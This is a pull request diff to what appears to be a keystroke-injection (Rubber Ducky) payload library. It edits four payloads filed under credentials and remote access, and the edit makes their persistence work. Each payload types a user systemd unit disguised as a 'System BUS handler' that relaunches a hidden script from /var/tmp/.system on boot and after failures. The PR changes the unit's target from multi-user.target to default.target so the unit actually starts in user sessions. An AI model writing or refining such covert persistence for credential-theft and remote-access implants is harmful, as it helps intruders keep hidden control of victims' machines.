### PR TITLE
Changing systemd Unit

### DIFF
--- a/payloads/library/credentials/DuckyLogger/payload.txt
+++ b/payloads/library/credentials/DuckyLogger/payload.txt
@@ -51,7 +51,7 @@ REM [creating systemd service to execute payload on boot]
 STRING mkdir -p ~/.config/systemd/user
 ENTER
 DELAY 200
-STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 ENTER
 DELAY 100
 
@@ -64,7 +64,7 @@ ENTER
 DELAY 100
 
 REM [creating systemd service to execute payload on boot]
-STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
 ENTER
 DELAY 100
 

--- a/payloads/library/credentials/sudoSnatch/payload.txt
+++ b/payloads/library/credentials/sudoSnatch/payload.txt
@@ -42,7 +42,7 @@ REM [creating systemd service to execute payload on boot]
 STRING mkdir -p ~/.config/systemd/user
 ENTER
 DELAY 200
-STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 ENTER
 DELAY 100
 
@@ -55,7 +55,7 @@ ENTER
 DELAY 100
 
 REM [creating systemd service for reboot]
-STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
 ENTER
 DELAY 100
 

--- a/payloads/library/remote_access/duckNet/payload
+++ b/payloads/library/remote_access/duckNet/payload
@@ -29,7 +29,7 @@ REM [creating non-root systemd service]
 STRING mkdir -p ~/.config/systemd/user
 ENTER
 DELAY 100
-STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 ENTER
 DELAY 100
 

--- a/payloads/library/remote_access/persistentReverseDucky/payload.txt
+++ b/payloads/library/remote_access/persistentReverseDucky/payload.txt
@@ -29,7 +29,7 @@ REM [creating non-root systemd service]
 STRING mkdir -p ~/.config/systemd/user
 ENTER
 DELAY 100
-STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 ENTER
 DELAY 100
 


### PR DESCRIPTION
Replacing multi-user.target with default.target as multi-user.target is removed from all systemd Units.